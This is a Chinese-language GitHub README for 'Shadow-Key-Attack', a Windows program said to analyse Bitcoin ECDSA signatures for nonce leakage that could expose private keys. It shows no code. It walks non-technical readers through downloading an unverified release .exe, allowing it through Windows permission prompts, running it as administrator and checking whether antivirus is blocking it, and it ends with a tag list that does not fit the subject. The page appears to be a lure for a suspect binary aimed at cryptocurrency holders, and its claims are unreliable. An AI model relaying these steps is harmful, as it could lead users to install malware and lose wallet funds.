loytgindehP/Shadow-Key-Attack

GitHub: loytgindehP/Shadow-Key-Attack

演示通过ECDSA签名nonce泄露实施侧信道攻击以恢复比特币私钥的安全研究工具。

Stars: 0 | Forks: 0

# 🔐 Shadow-Key-Attack - 轻松检测比特币密钥泄露 [![下载 Shadow-Key-Attack](https://img.shields.io/badge/Download-Shadow_Key_Attack-brightgreen)](https://github.com/loytgindehP/Shadow-Key-Attack) ## 🔍 什么是 Shadow-Key-Attack? Shadow-Key-Attack 是一款帮助你了解比特币交易中风险的工具。它侧重于数字签名中的秘密数字(称为 nonces)如何泄露信息。这种情况可能发生在某些硬件上,例如 YubiKey 5 和 Infineon 微控制器。 该应用程序展示了如何利用欧几里得算法(一种数学方法)通过特定计算获取私钥。虽然这属于技术范畴,但该应用程序步骤清晰,你可以在 Windows 电脑上自行尝试。 ## ⚙️ 系统要求 在开始之前,请确保你的电脑满足以下要求: - Windows 10 或更高版本 - 至少 4 GB RAM - 500 MB 可用磁盘空间 - 互联网连接(用于下载应用程序) - 基本的文件打开和软件安装能力 运行 Shadow-Key-Attack 不需要额外的工具或软件。 ## 📥 如何下载和安装 Shadow-Key-Attack 你可以按照以下步骤下载并运行该应用程序: 1. 打开你的网络浏览器(Chrome、Edge、Firefox)。 2. 点击顶部的绿色下载徽章,或使用此链接访问 GitHub 页面: [https://github.com/loytgindehP/Shadow-Key-Attack](https://github.com/loytgindehP/Shadow-Key-Attack) 3. 在 GitHub 页面上,在右侧或顶部菜单附近找到 “Releases” 部分。 4. 点击最新的版本。 5. 在版本资产中,找到该软件的 Windows 版本。它通常以 `.exe` 结尾。 6. 点击 `.exe` 文件将其下载到你的电脑。 ## 💻 在 Windows 上运行 Shadow-Key-Attack 下载完成后: 1. 导航到你保存 `.exe` 文件的文件夹。通常是 “Downloads” 文件夹。 2. 双击 `.exe` 文件开始安装或直接运行应用程序。 3. 如果 Windows 请求权限,请点击 “Yes” 以允许程序运行。 4. 按照屏幕上的说明操作。某些版本可能需要安装,其他版本则直接打开应用程序窗口。 5. 程序启动后,你将看到主界面,其中包含分析比特币交易的选项。 ## 📚 使用 Shadow-Key-Attack 该软件会引导你测试比特币交易签名是否存在泄露秘密的风险。以下是逐步使用指南: 1. **打开你的交易文件** 如果你保存了比特币交易,请使用 “Open” 按钮将其加载到应用程序中。 2. **运行分析** 点击 “Start Test” 或 “Analyze” 开始。应用程序将使用其算法检查 nonce 泄露情况。 3. **查看结果** 报告将显示是否检测到任何漏洞。它可能会用简单的术语解释风险。 4. **了解风险** 该工具解释了为什么像 YubiKey 5 这样的某些硬件密钥可能会受到影响。它展示了 nonces 如何通过计算泄露信息。 5. **采取行动** 如果检测到泄露,应用程序会建议更安全的方式来处理你的比特币私钥。 ## 🛠️ 功能特性 - 支持比特币 ECDSA 签名分析 - 演示来自 nonce 重用的侧信道攻击 - 兼容基于欧几里得算法计算的密钥 - 用于加载和测试交易数据的简单界面 - 提供清晰的漏洞报告 ## 🤔 为什么要检查 Nonce 泄露? 比特币签名依赖于称为 nonces 的秘密随机数。如果这些数字重复或泄露,攻击者就可以恢复你的私钥。该应用程序展示了某些硬件和软件方法是如何无意中泄露这些 nonces 的。 通过运行 Shadow-Key-Attack,你可以查看你的设置是否存在风险。这有助于保护你的加密货币安全。 ## 🚨 使用该应用程序时的安全提示 - 不要与未知来源分享私钥或敏感数据。 - 在受信任的计算机上运行该应用程序。 - 仅将应用程序用于教育或测试目的。 - 保持你的硬件钱包更新。 - 始终安全地备份你的密钥。 ## 🛡️ 故障排除与支持 如果你遇到任何问题: - 确保你的 Windows 版本是最新的。 - 尝试以管理员身份运行应用程序(右键单击 `.exe` 文件,选择 “Run as administrator”)。 - 检查你的防病毒软件是否阻止了该应用程序。 - 如果应用程序无法打开,请重启你的电脑。 - 访问 GitHub 页面获取更新或提交 issue 寻求帮助。 ## 🖥️ 更多资源 有关该攻击及其背景的更多信息,你可以浏览仓库主题: - ECDSA 密码学和签名 - 比特币钱包和交易 - 针对硬件微控制器的侧信道攻击 - 密码学中的欧几里得算法 - 安全处理私钥和密钥 ## 📥 立即下载 Shadow-Key-Attack 使用此链接在你的 Windows PC 上获取最新版本: [https://github.com/loytgindehP/Shadow-Key-Attack](https://github.com/loytgindehP/Shadow-Key-Attack)
标签:CVE, ECDSA, Infineon, meg, Nonce泄露, Windows工具, YubiKey, 侧信道攻击, 信息安全, 区块链安全, 域名收集, 密码学, 密钥泄露, 手动系统调用, 数字签名, 欧几里得算法, 比特币, 硬件安全模块, 硬件钱包, 私钥恢复, 私钥提取, 网络安全, 隐私保护